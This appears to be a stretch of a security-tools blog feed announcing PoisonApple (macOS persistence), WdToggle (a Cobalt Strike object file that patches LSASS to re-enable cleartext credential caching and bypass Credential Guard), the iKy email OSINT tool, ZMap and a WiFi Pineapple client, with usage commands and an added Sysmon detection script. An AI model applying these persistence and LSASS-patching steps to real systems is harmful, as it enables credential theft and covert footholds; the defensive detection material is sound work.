|<br /> `--- ---' v0.2.0<br /><br />+--------------------+<br />| AtJob |<br />+--------------------+<br />| Bashrc |<br />+--------------------+<br />| Cron |<br />+--------------------+<br />| CronRoot |<br />+--------------------+<br />| Emond |<br />+--------------------+<br />| LaunchAgent |<br />+--------------------+<br />| LaunchAgentUser |<br />+--------------------+<br />| LaunchDaemon |<br />+--- -----------------+<br />| LoginHook |<br />+--------------------+<br />| LoginHookUser |<br />+--------------------+<br />| LoginItem |<br />+--------------------+<br />| LogoutHook |<br />+--------------------+<br />| LogoutHookUser |<br />+--------------------+<br />| Periodic |<br />+--------------------+<br />| Reopen |<br />+--------------------+<br />| Zshrc |<br />+--------------------+<br /></code></pre> <p>Apply a persistence mechanism:</p> <pre><code>$ poisonapple -t LaunchAgentUser -n testing<br /> , _______ __<br /> .-.:|.-. | _ .-----|__|-----.-----.-----.<br />.' '. |. | | | | |__ --| | | | |<br />'-."~". .-' |. ____|_____|__|_____|_____|__|__|<br /> } ` } { |: | _______ __<br /> } } } { |::.| | _ .-----.-----| |-----.<br /> } ` } { `---' |. | | | | | | | -__|<br />.-'"~" '-. |. _ | __| __|__|_____|<br />'. .' |: | |__| |__|<br /> '-_.._-' |::.|:. |<br /> `--- ---' v0.2.0<br /><br />[+] Success! 
The persistence mechanism action was successful: LaunchAgentUser<br /></code></pre> <p>If no command is specified (-c) a default trigger command will be used which writes to a file on the <a href="https://www.kitploit.com/search/label/Desktop" target="_blank" title="Desktop">Desktop</a> every time the persistence mechanism is triggered:</p> <pre><code>$ cat ~/Desktop/PoisonApple-LaunchAgentUser<br />Triggered @ Tue Mar 23 17:46:02 CDT 2021 <br />Triggered @ Tue Mar 23 17:46:13 CDT 2021 <br />Triggered @ Tue Mar 23 17:46:23 CDT 2021 <br />Triggered @ Tue Mar 23 17:46:33 CDT 2021 <br />Triggered @ Tue Mar 23 17:46:43 CDT 2021 <br />Triggered @ Tue Mar 23 17:46:53 CDT 2021 <br />Triggered @ Tue Mar 23 17:47:03 CDT 2021 <br />Triggered @ Tue Mar 23 17:47:13 CDT 2021 <br />Triggered @ Tue Mar 23 17:48:05 CDT 2021 <br />Triggered @ Tue Mar 23 17:48:15 CDT 2021<br /></code></pre> <p>Remove a persistence mechanism:</p> <pre><code>$ poisonapple -t LaunchAgentUser -n <a href="https://www.kitploit.com/search/label/Testing" target="_blank" title="testing">testing</a> -r<br />...<br /></code></pre> <p>Use a custom command:</p> <pre><code>$ poisonapple -t LaunchAgentUser -n foo -c "echo foo >> /Users/user/Desktop/foo"<br />...<br /></code></pre> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/CyborgSecurity/PoisonApple" rel="nofollow" target="_blank" title="Download PoisonApple">Download PoisonApple</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-71438683368923322122021-02-28T17:30:00.015-03:002021-02-28T17:30:05.263-03:00WdToggle - A Beacon Object File (BOF) For Cobalt Strike Which Uses Direct System Calls To Enable WDigest Credential Caching<div class="separator" style="clear: both; text-align: center;"><a 
href="https://1.bp.blogspot.com/-VDUSQhlaWUk/YDSYlbe1orI/AAAAAAAAVcw/wJgwsKPumsU5NZ3v0UlgAFyLJimv1NNBgCNcBGAsYHQ/s767/WdToggle_1_WdToggle.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="767" data-original-width="543" src="https://1.bp.blogspot.com/-VDUSQhlaWUk/YDSYlbe1orI/AAAAAAAAVcw/wJgwsKPumsU5NZ3v0UlgAFyLJimv1NNBgCNcBGAsYHQ/s16000/WdToggle_1_WdToggle.png" /></a></div><p><br /></p>
<p>A Proof of Concept <a href="https://www.kitploit.com/search/label/Cobalt%20Strike" target="_blank" title="Cobalt Strike">Cobalt Strike</a> Beacon Object File which uses <a href="https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/" rel="nofollow" target="_blank" title="direct system calls">direct system calls</a> to enable <strong>WDigest</strong> credential caching and circumvent <strong>Credential Guard</strong> (if enabled).</p>
<p>Additional guidance can be found in this blog post: <a href="https://outflank.nl/blog/?p=1592" rel="nofollow" target="_blank" title="https://outflank.nl/blog/?p=1592">https://outflank.nl/blog/?p=1592</a></p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Background</b></span><br />
<p>This PoC code is based on the following excellent blog posts:</p>
<p><a href="https://blog.xpnsec.com/exploring-mimikatz-part-1/" rel="nofollow" target="_blank" title="Exploring Mimikatz - Part 1 - WDigest">Exploring Mimikatz - Part 1 - WDigest</a></p>
<p><a href="https://teamhydra.blog/2020/08/25/bypassing-credential-guard/" rel="nofollow" target="_blank" title="Bypassing Credential Guard">Bypassing Credential Guard</a></p>
<p>Utilizing direct system calls via inline assembly in BOF code provides a more opsec-safe way of interacting with the LSASS process. Using direct system calls avoids AV/EDR software intercepting user-mode API calls.</p>
<p>Visual Studio (C++) does not support inline assembly for x64 processors. So in order to write a single Beacon Object File containing our compiled / assembled code we must use the <a href="http://mingw-w64.org" rel="nofollow" target="_blank" title="Mingw-w64">Mingw-w64</a> (GCC for Windows) compiler.</p>
<br /><span style="font-size: large;"><b>What is this repository for?</b></span><br />
<ul>
<li>Demonstrate the usage of direct system calls using inline assembly to provide a more opsec-safe way of interacting with the LSASS process.</li>
<li>Enable <strong>WDigest</strong> credential caching by toggling the <code>g_fParameter_UseLogonCredential</code> global parameter to 1 within the LSASS process (wdigest.dll module).</li>
<li>Circumvent <strong>Credential Guard</strong> (if enabled) by toggling the <code>g_IsCredGuardEnabled</code> variable to 0 within the LSASS process (wdigest.dll module).</li>
<li>Execute this code within the Beacon process using a <a href="https://www.cobaltstrike.com/help-beacon-object-files" rel="nofollow" target="_blank" title="Beacon object file">Beacon object file</a>.</li>
</ul>
<br /><span style="font-size: large;"><b>How do I set this up?</b></span><br />
<p>We will not supply compiled binaries. You will have to do this yourself:</p>
<ul>
<li><p>Clone this repository.</p></li>
<li><p>Make sure you have the Mingw-w64 compiler installed. On macOS, for example, we can use the ports collection to install Mingw-w64 (<code>sudo port install mingw-w64</code>).</p></li>
<li><p>Run the <code>make</code> command to compile the Beacon object file.</p></li>
<li><p>Within a Cobalt Strike beacon context run the <code>inline-execute</code> command and provide the path to the <code>WdToggle.o</code> object file.</p></li>
<li><p>Run the Cobalt Strike <code>logonpasswords</code> command (Mimikatz) and notice that clear text <a href="https://www.kitploit.com/search/label/Passwords" target="_blank" title="passwords">passwords</a> are enabled again for new user logins or users who <strong>unlock</strong> their desktop session.</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-S3N7dcv6Skg/YDSYsSVpvUI/AAAAAAAAVc0/SznQiTKQA9cCen2qIysM7BrfyIMyDpzAQCNcBGAsYHQ/s767/WdToggle_1_WdToggle.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="767" data-original-width="543" src="https://1.bp.blogspot.com/-S3N7dcv6Skg/YDSYsSVpvUI/AAAAAAAAVc0/SznQiTKQA9cCen2qIysM7BrfyIMyDpzAQCNcBGAsYHQ/s16000/WdToggle_1_WdToggle.png" /></a></div><br /></li>
</ul>
<span style="font-size: large;"><b>Limitations</b></span><br />
<ul>
<li>This memory patch is not reboot persistent, so after a reboot you must rerun the code.</li>
<li>The memory offsets of the <code>wdigest!g_fParameter_UseLogonCredential</code> and <code>wdigest!g_IsCredGuardEnabled</code> global variables can change between Windows versions and revisions. We provided some offsets for different builds, but these can change in future releases. You can add your own version offsets, which can be found using the Windows debugger tools:</li>
</ul>
<pre><code>C:\Program Files (x86)\Windows Kits\10\Debuggers\x64>cdb.exe -z C:\Windows\System32\wdigest.dll<br /><br />0:000>x wdigest!g_fParameter_UseLogonCredential<br />00000001`800361b4 wdigest!g_fParameter_UseLogonCredential = <no type information><br />0:000> x wdigest!g_IsCredGuardEnabled<br />00000001`80035c08 wdigest!g_IsCredGuardEnabled = <no type information><br />0:000><br /></code></pre>
<br /><span style="font-size: large;"><b>Detection</b></span><br />
<p>To detect credential theft through LSASS memory access, we could use a tool like <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon" rel="nofollow" target="_blank" title="Sysmon">Sysmon</a>. Sysmon can be configured to log processes opening a handle to the lsass.exe process. With this configuration applied, we can gather telemetry for suspicious processes accessing the LSASS process and help detect possible credential dumping activity. Of course, there are more options to detect credential theft, for example using an advanced detection platform like <a href="https://www.kitploit.com/search/label/Windows%20Defender" target="_blank" title="Windows Defender">Windows Defender</a> ATP. But if you don’t have the budget and luxury of using these platforms, then Sysmon is the free tool that can help fill the gap.</p>
<br /><span style="font-size: large;"><b>Credits</b></span><br />
<ul>
<li>The assembly code used within this tool is based on the assembly output from the <a href="https://github.com/jthuraisamy/SysWhispers" rel="nofollow" target="_blank" title="SysWhispers">SysWhispers</a> tool from <a href="https://twitter.com/Jackson_T" rel="nofollow" target="_blank" title="@Jackson_T">@Jackson_T</a>.</li>
<li>Adam Chester <a href="https://twitter.com/_xpn_" rel="nofollow" target="_blank" title="@_xpn_">@_xpn_</a></li>
<li>N4kedTurtle from <a href="https://teamhydra.blog" rel="nofollow" target="_blank" title="Team Hydra">Team Hydra</a></li>
</ul>
<br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/outflanknl/WdToggle" rel="nofollow" target="_blank" title="Download WdToggle">Download WdToggle</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-75790936856663238902021-02-13T17:30:00.001-03:002021-02-13T17:30:09.579-03:00Project iKy v2.7.0 - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface<div class="separator" style="clear: both; text-align: center;">
</div>
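<p>Added example for the Detection section of the WdToggle post above (it is not code from the WdToggle project): the triage a defender would run over Sysmon Event ID 10 (ProcessAccess) records once handles to lsass.exe are being logged. A memory patch of the kind that post describes needs a handle with PROCESS_VM_WRITE and PROCESS_VM_OPERATION rights, and Sysmon records the rights granted in the GrantedAccess field, so the check ranks records by that mask instead of treating every lsass.exe access alike. The event records, process names and paths below are constructed samples; the access-right constants are the standard Windows values.</p>

```python
"""Triage Sysmon Event ID 10 (ProcessAccess) records for handles to lsass.exe.

Added example for the WdToggle Detection section; not part of the WdToggle
project. The records in SAMPLE_EVENTS are constructed in the shape of Sysmon's
EventData block, not real telemetry.
"""
import xml.etree.ElementTree as ET

# Process access rights from winnt.h. WriteProcessMemory needs PROCESS_VM_WRITE
# and PROCESS_VM_OPERATION; ReadProcessMemory needs PROCESS_VM_READ.
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
WRITE_RIGHTS = PROCESS_VM_OPERATION | PROCESS_VM_WRITE

LSASS_IMAGE = r"c:\windows\system32\lsass.exe"

# Constructed sample records; only the fields the check needs are included.
SAMPLE_EVENTS = [
    # query-only handle from an AV engine: expected baseline noise
    r"""<EventData>
  <Data Name="UtcTime">2021-02-28 20:30:01.001</Data>
  <Data Name="SourceImage">C:\Program Files\Windows Defender\MsMpEng.exe</Data>
  <Data Name="TargetImage">C:\Windows\system32\lsass.exe</Data>
  <Data Name="GrantedAccess">0x1000</Data>
</EventData>""",
    # read access: enough to copy LSASS memory out (classic credential dump)
    r"""<EventData>
  <Data Name="UtcTime">2021-02-28 20:31:12.002</Data>
  <Data Name="SourceImage">C:\Windows\System32\Taskmgr.exe</Data>
  <Data Name="TargetImage">C:\Windows\system32\lsass.exe</Data>
  <Data Name="GrantedAccess">0x1410</Data>
</EventData>""",
    # write access: enough to patch LSASS memory in place (constructed path)
    r"""<EventData>
  <Data Name="UtcTime">2021-02-28 20:32:45.003</Data>
  <Data Name="SourceImage">C:\Users\alice\AppData\Local\Temp\unknown.exe</Data>
  <Data Name="TargetImage">C:\Windows\system32\lsass.exe</Data>
  <Data Name="GrantedAccess">0x0038</Data>
</EventData>""",
    # a different target process: ignored by the check
    r"""<EventData>
  <Data Name="UtcTime">2021-02-28 20:33:00.004</Data>
  <Data Name="SourceImage">C:\Windows\System32\svchost.exe</Data>
  <Data Name="TargetImage">C:\Windows\explorer.exe</Data>
  <Data Name="GrantedAccess">0x1400</Data>
</EventData>""",
]


def parse_event(xml_text):
    """Return the Data fields of one record as a {Name: value} dict."""
    root = ET.fromstring(xml_text)
    fields = {}
    for elem in root.iter():
        # strip any XML namespace so records exported from Event Viewer parse too
        if elem.tag.rsplit("}", 1)[-1] == "Data":
            fields[elem.get("Name")] = elem.text or ""
    return fields


def classify(fields):
    """Severity of one ProcessAccess record, or None when lsass.exe is not the target."""
    if fields.get("TargetImage", "").lower() != LSASS_IMAGE:
        return None
    mask = int(fields.get("GrantedAccess", "0x0"), 16)
    if (mask & WRITE_RIGHTS) == WRITE_RIGHTS:
        return "high"    # enough rights to patch LSASS memory in place
    if mask & PROCESS_VM_READ:
        return "medium"  # enough rights to read (dump) LSASS memory
    return "low"         # query-only handle, common for security products


def triage(records):
    """Return (SourceImage, GrantedAccess, severity) for every record that touched lsass.exe."""
    findings = []
    for record in records:
        fields = parse_event(record)
        severity = classify(fields)
        if severity is not None:
            findings.append((fields["SourceImage"], fields["GrantedAccess"], severity))
    return findings


if __name__ == "__main__":
    for source, access, severity in triage(SAMPLE_EVENTS):
        print(f"{severity:6} {access:>8}  {source}")
```

<p>Run it as a script to print the ranked findings. In practice the records would come from an exported event log or a SIEM query rather than the inline list, and the query-only handles opened by security products are the expected baseline to tune out; the write-capable handles are the ones worth an immediate look, because a process that only dumps credentials never needs them.</p>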
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Nbh_UpDzFos/XoDcPeWj8DI/AAAAAAAASH8/3XczI023lo4xtaLGWZtm1cdnZ__OiB-HQCNcBGAsYHQ/s1600/iky.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="480" data-original-width="853" height="360" src="https://1.bp.blogspot.com/-Nbh_UpDzFos/XoDcPeWj8DI/AAAAAAAASH8/3XczI023lo4xtaLGWZtm1cdnZ__OiB-HQCNcBGAsYHQ/s640/iky.gif" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<div style="text-align: justify;">
Project iKy is a tool that collects information from an email and shows results in a nice visual interface.</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
Visit the Gitlab Page of the <a href="https://kennbroorg.gitlab.io/ikyweb/" rel="nofollow noreferrer noopener" target="_blank">Project</a></div>
</div>
<a name='more'></a><br />
<div>
<h2>
Installation</h2>
<div style="text-align: justify;">
<h3 style="text-align: start;">
Clone repository</h3>
<pre><code>git clone https://gitlab.com/kennbroorg/iKy.git</code></pre>
<h3 style="text-align: start;">
Install Backend</h3>
<h4 style="text-align: start;">
Redis</h4>
<div style="text-align: start;">
You must install Redis</div>
<pre><code>wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
sudo make install</code></pre>
<h4 style="text-align: start;">
Python stuff and Celery</h4>
<div style="text-align: start;">
You must install the libraries inside requirements.txt</div>
<pre><code>python3 -m pip install -r requirements.txt</code></pre>
<h3 style="text-align: start;">
Install Frontend</h3>
<h4 style="text-align: start;">
Node</h4>
<div style="text-align: start;">
First of all, install <a href="https://nodejs.org/en/" rel="nofollow noreferrer noopener" target="_blank">nodejs</a>.</div>
<h4 style="text-align: start;">
Dependencies</h4>
<div style="text-align: start;">
Inside the directory <strong>frontend</strong> install the dependencies</div>
<pre><code>cd frontend
npm install</code></pre>
</div>
</div>
<br />
<h2 style="text-align: start;">
Wake up iKy Tool</h2>
<h3 style="text-align: start;">
Turn on Backend</h3>
<h4 style="text-align: start;">
Redis</h4>
<div style="text-align: start;">
Turn on the server in a terminal</div>
<pre><code>redis-server</code></pre>
<h4 style="text-align: start;">
Python stuff and Celery</h4>
<div style="text-align: start;">
Turn on Celery in another terminal, within the directory <strong>backend</strong></div>
<pre><code>./celery.sh</code></pre>
<div style="text-align: start;">
Again, in another terminal turn on backend app from directory <strong>backend</strong></div>
<pre><code>python3 app.py</code></pre>
<h3 style="text-align: start;">
Turn on Frontend</h3>
<div style="text-align: start;">
Finally, to run the frontend server, execute the following command from the directory <strong>frontend</strong></div>
<pre><code>npm start</code></pre>
<br />
<h2>
Screen after turning on iKy</h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-7o9lUITzUGM/XoDaosFIc0I/AAAAAAAASH0/Lk0MScYp0q8Vx2EbqANXe9w0-t2IIwfIgCNcBGAsYHQ/s1600/Screens1000.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="563" data-original-width="1000" height="360" src="https://1.bp.blogspot.com/-7o9lUITzUGM/XoDaosFIc0I/AAAAAAAASH0/Lk0MScYp0q8Vx2EbqANXe9w0-t2IIwfIgCNcBGAsYHQ/s640/Screens1000.png" width="640" /></a></div>
<br />
<h3>
Browser</h3>
<h3>
<div style="font-size: medium; font-weight: 400;">
Open the browser in this <a href="http://127.0.0.1:4200/" rel="nofollow noreferrer noopener" target="_blank">url</a></div>
</h3>
<h3>
Config API Keys</h3>
<h3>
<div style="font-size: medium; font-weight: 400;">
Once the application is loaded in the browser, you should go to the Api Keys option and load the values of the APIs that are needed.</div>
<ul>
<li><span style="font-size: small;">Fullcontact: Generate the APIs from <a href="https://support.fullcontact.com/hc/en-us/articles/115003415888-Getting-Started-FullContact-v2-APIs" rel="nofollow noreferrer noopener" target="_blank">here</a></span></li>
<li><span style="font-size: small;">Twitter: Generate the APIs from <a href="https://developer.twitter.com/en/docs/basics/authentication/guides/access-tokens.html" rel="nofollow noreferrer noopener" target="_blank">here</a></span></li>
<li><span style="font-size: small;">Linkedin: Only the user and password of your account must be loaded</span></li>
<li><span style="font-size: small;">HaveIBeenPwned : Generate the APIs from <a href="https://haveibeenpwned.com/API/Key" rel="nofollow noreferrer noopener" target="_blank">here</a> (Paid)</span></li>
<li><span style="font-size: small;">Emailrep.io : Generate the APIs from <a href="https://emailrep.io/key" rel="nofollow noreferrer noopener" target="_blank">here</a></span></li>
</ul>
</h3>
<h1>
Wiki</h1>
<h3>
<ul>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/home"><span style="font-size: small;">iKy Wiki</span></a></li>
<li><a href="https://kennbroorg.gitlab.io/ikyweb/" rel="nofollow noreferrer noopener" target="_blank"><span style="font-size: small;">iKy Page</span></a></li>
<li><span style="font-size: small;">Installation</span><ul>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/Installation/EasyInstall"><span style="font-size: small;">Easy Install</span></a></li>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/Installation/Vagrant"><span style="font-size: small;">Vagrant</span></a></li>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/Installation/Manual-install-(Compacted)"><span style="font-size: small;">Manual install (Compacted)</span></a></li>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/Installation/Manual-install-(Detailed)"><span style="font-size: small;">Manual install (Detailed)</span></a></li>
</ul>
</li>
<li><span style="font-size: small;">Update</span><ul>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/Update/Soft"><span style="font-size: small;">Soft Update</span></a></li>
</ul>
</li>
<li><span style="font-size: small;">Wake Up</span><ul>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/Wakeup/WakeUp"><span style="font-size: small;">Turn on the project</span></a></li>
</ul>
</li>
<li><span style="font-size: small;">APIs</span><ul>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/APIs/ApiKeys-through-the-browser"><span style="font-size: small;">APIs through frontend</span></a></li>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/APIs/APIs-through-the-backend"><span style="font-size: small;">APIs through backend</span></a></li>
</ul>
</li>
<li><span style="font-size: small;">Backend</span><ul>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/Backend/Backend-through-url"><span style="font-size: small;">Backend through URL</span></a></li>
</ul>
</li>
<li><span style="font-size: small;">Videos</span><ul>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/Videos/Installations"><span style="font-size: small;">Installation videos</span></a><ul>
<li><a href="https://vimeo.com/350877994" rel="nofollow noreferrer noopener" target="_blank"><span style="font-size: small;">Installation in Kali 2019</span></a></li>
<li><a href="https://vimeo.com/347435255" rel="nofollow noreferrer noopener" target="_blank"><span style="font-size: small;">Installation in ubuntu 18.04</span></a></li>
<li><a href="https://vimeo.com/332359273" rel="nofollow noreferrer noopener" target="_blank"><span style="font-size: small;">Installation in ubuntu 16.04</span></a></li>
</ul>
</li>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/Videos/Demos"><span style="font-size: small;">Demo videos</span></a><ul>
<li><a href="https://vimeo.com/397862772" rel="nofollow noreferrer noopener" target="_blank"><span style="font-size: small;">iKy eko15</span></a></li>
<li><a href="https://vimeo.com/347085110" rel="nofollow noreferrer noopener" target="_blank"><span style="font-size: small;">iKy version 2</span></a></li>
<li><a href="https://vimeo.com/349011105" rel="nofollow noreferrer noopener" target="_blank"><span style="font-size: small;">Testing iKy with Emiliano</span></a></li>
<li><a href="https://vimeo.com/342843348" rel="nofollow noreferrer noopener" target="_blank"><span style="font-size: small;">Testing iKy with Giba</span></a></li>
<li><a href="https://vimeo.com/326114716" rel="nofollow noreferrer noopener" target="_blank"><span style="font-size: small;">iKy version 1</span></a></li>
<li><a href="https://vimeo.com/272495754" rel="nofollow noreferrer noopener" target="_blank"><span style="font-size: small;">iKy version 0</span></a></li>
</ul>
</li>
</ul>
</li>
<li><a href="https://gitlab.com/kennbroorg/iKy/-/wikis/Disclaimer"><span style="font-size: small;">Disclaimer</span></a></li>
</ul>
</h3>
<div>
<br />
<br />
<h2>
Demo Videos</h2>
<div align="center">
<iframe allow="autoplay; fullscreen" allowfullscreen="" frameborder="0" height="360" src="https://player.vimeo.com/video/397862772" width="640"></iframe><br />
iKy eko15</div>
<div align="center">
<iframe allow="autoplay; fullscreen" allowfullscreen="" frameborder="0" height="360" src="https://player.vimeo.com/video/347085110" width="640"></iframe><br />
iKy Version 2<br />
<br /></div>
<div align="center">
<iframe allow="autoplay; fullscreen" allowfullscreen="" frameborder="0" height="360" src="https://player.vimeo.com/video/349011105" width="640"></iframe><br />
Testing iKy with Emiliano<br />
<br /></div>
<div align="center">
<iframe allow="autoplay; fullscreen" allowfullscreen="" frameborder="0" height="360" src="https://player.vimeo.com/video/342843348" width="640"></iframe><br />
Testing iKy with Giba<br />
<br /></div>
<div align="center">
<iframe allow="autoplay; fullscreen" allowfullscreen="" frameborder="0" height="360" src="https://player.vimeo.com/video/326114716" width="640"></iframe><br />
iKy version 1<br />
<br /></div>
<div align="center">
<iframe allow="autoplay; fullscreen" allowfullscreen="" frameborder="0" height="360" src="https://player.vimeo.com/video/272495754" width="640"></iframe> </div><div align="center"> iKy version 0</div>
<br />
<h2>
Disclaimer</h2>
<div>
Anyone who contributes or contributed to the project, including me, is not responsible for the use of the tool (Neither the legal use nor the illegal use, nor the "other" use).</div>
<div>
Keep in mind that this software was initially written for a joke, then for educational purposes (to educate ourselves), and now the goal is to collaborate with the community making quality free software, and while the quality is not excellent (sometimes not even good) we strive to pursue excellence.</div>
<div>
Consider that all the information collected is free and available online; the tool only tries to discover, collect and display it. Many times the tool cannot even achieve its goal of discovery and collection. Please load the necessary APIs before remembering my mother. If even with the APIs it doesn't show the "nice" things that you expect to see, try other e-mails before you remember my mother. If you still do not see the "nice" things you expect to see, you can create an issue, contact us by e-mail or by any of the social networks, but keep in mind that my mother is neither the creator of nor a contributor to the project.</div>
<div>
We do not refund your money if you are not satisfied. I hope you enjoy using the tool as much as we enjoy doing it. The effort was and is enormous (Time, knowledge, coding, tests, reviews, etc.) but we would do it again. Do not use the tool if you cannot read the instructions and / or this disclaimer clearly.</div>
<div>
By the way, for those who insist on remembering my mother, she died many years ago but I love her as if she were right here.</div>
<div>
<br /></div>
<div>
<br /></div>
</div>
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://gitlab.com/kennbroorg/iKy" rel="nofollow" target="_blank" title="Download Project iKy">Download Project iKy v2.7.0</a></span></b><br />
<b><br /></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-53874732933159566742021-01-23T08:30:00.001-03:002021-01-23T08:30:03.220-03:00Zmap - A Fast Single Packet Network Scanner Designed For Internet-wide Network Surveys<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-0RBqbOTe8FU/YAugth3BMuI/AAAAAAAAVDI/iMEHSsGgi7AHz_JawMIDFQEV40ricuSIgCNcBGAsYHQ/s741/zmap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="594" data-original-width="741" height="513" src="https://1.bp.blogspot.com/-0RBqbOTe8FU/YAugth3BMuI/AAAAAAAAVDI/iMEHSsGgi7AHz_JawMIDFQEV40ricuSIgCNcBGAsYHQ/w640-h513/zmap.png" width="640" /></a></div><p><br /></p> <p>ZMap is a fast single packet network scanner designed for Internet-wide network surveys. On a typical <a href="https://www.kitploit.com/search/label/Desktop" target="_blank" title="desktop">desktop</a> computer with a gigabit <a href="https://www.kitploit.com/search/label/Ethernet" target="_blank" title="Ethernet">Ethernet</a> connection, ZMap is capable of <a href="https://www.kitploit.com/search/label/Scanning" target="_blank" title="scanning">scanning</a> the entire public IPv4 address space in under 45 minutes. With a 10GigE connection and <a href="http://www.ntop.org/products/packet-capture/pf_ring/" rel="nofollow" target="_blank" title="PF_RING">PF_RING</a>, ZMap can scan the IPv4 address space in under 5 minutes.</p> <p>ZMap operates on GNU/Linux, Mac OS, and BSD. ZMap currently has fully implemented probe modules for TCP SYN scans, ICMP, DNS queries, UPnP, BACNET, and can send a large number of <a href="https://github.com/zmap/zmap/blob/master/examples/udp-probes/README" rel="nofollow" target="_blank" title="UDP probes">UDP probes</a>. 
If you are looking to do more involved scans, e.g., banner grab or TLS handshake, take a look at <a href="https://github.com/zmap/zgrab" rel="nofollow" target="_blank" title="ZGrab">ZGrab</a>, ZMap's sister project that performs stateful application-layer handshakes.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Installation</b></span><br /> <p>The latest stable release of ZMap is version 2.1.1 and supports Linux, macOS, and BSD. We recommend installing ZMap from HEAD rather than using a distro package manager.</p> <p><strong>Instructions on building ZMap from source</strong> can be found in <a href="https://github.com/zmap/zmap/blob/master/INSTALL.md" rel="nofollow" target="_blank" title="INSTALL">INSTALL</a>.</p> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p>A guide to using ZMap is found in our <a href="https://github.com/zmap/zmap/wiki" rel="nofollow" target="_blank" title="GitHub Wiki">GitHub Wiki</a>.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/zmap/zmap" rel="nofollow" target="_blank" title="Download Zmap">Download Zmap</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-54485456094115032442021-01-14T17:30:00.013-03:002021-01-14T17:30:06.740-03:00Pineapple-MK7-REST-Client - WiFi Hacking Workflow With Pineapple Mark 7 API<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-bQbG8autjNA/X_uw36vnizI/AAAAAAAAU9U/q_hvPb64Zrck1ITtxbfigTAOO2XfMOzgACNcBGAsYHQ/s682/Pineapple-MK7-REST-Client_1_recon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="519" data-original-width="682" height="488" src="https://1.bp.blogspot.com/-bQbG8autjNA/X_uw36vnizI/AAAAAAAAU9U/q_hvPb64Zrck1ITtxbfigTAOO2XfMOzgACNcBGAsYHQ/w640-h488/Pineapple-MK7-REST-Client_1_recon.png" width="640" 
/></a></div><p><br /></p><span style="font-size: x-large;"><b>PINEAPPLE MK7 REST CLIENT</b></span><br />
<ul> <li>The leading rogue access point and WiFi <a href="https://www.kitploit.com/search/label/Pentest%20Toolkit" target="_blank" title="pentest toolkit">pentest toolkit</a> for close access operations.</li> <li>Passive and active attacks analyze <a href="https://www.kitploit.com/search/label/Vulnerable" target="_blank" title="vulnerable">vulnerable</a> and misconfigured devices.</li> <li><strong>@<em>HAK5</em></strong></li> </ul>
<blockquote> <p><strong>Author</strong>:: TW-D</p> <p><strong>Version</strong>:: 1.0.2</p> <p><strong>Copyright</strong>:: Copyright (c) 2021 TW-D</p> <p><strong>License</strong>:: Distributed under the same terms as Ruby</p> <p><strong>Doc</strong>:: <a href="https://docs.hak5.org/hc/en-us/articles/360049854174-WiFi-Pineapple-Mark-VII-REST-API" rel="nofollow" target="_blank" title="https://docs.hak5.org/hc/en-us/articles/360049854174-WiFi-Pineapple-Mark-VII-REST-API">https://docs.hak5.org/hc/en-us/articles/360049854174-WiFi-Pineapple-Mark-VII-REST-API</a></p> <p><strong>Requires</strong>:: ruby >= 2.7.0, rest-client 2.1.0 gem and Pineapple MK7 <a href="https://www.kitploit.com/search/label/Firmware" target="_blank" title="Firmware">Firmware</a> 1.0.1</p> <p><strong>Installation</strong>::</p> <ul> <li> <p>sudo apt-get install ruby ruby-dev</p> </li> <li> <p>sudo gem install rest-client</p></li></ul></blockquote><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Usage</b></span><br />
<p>See/edit/execute the files in the <strong><em>samples/</em></strong> folder.</p>
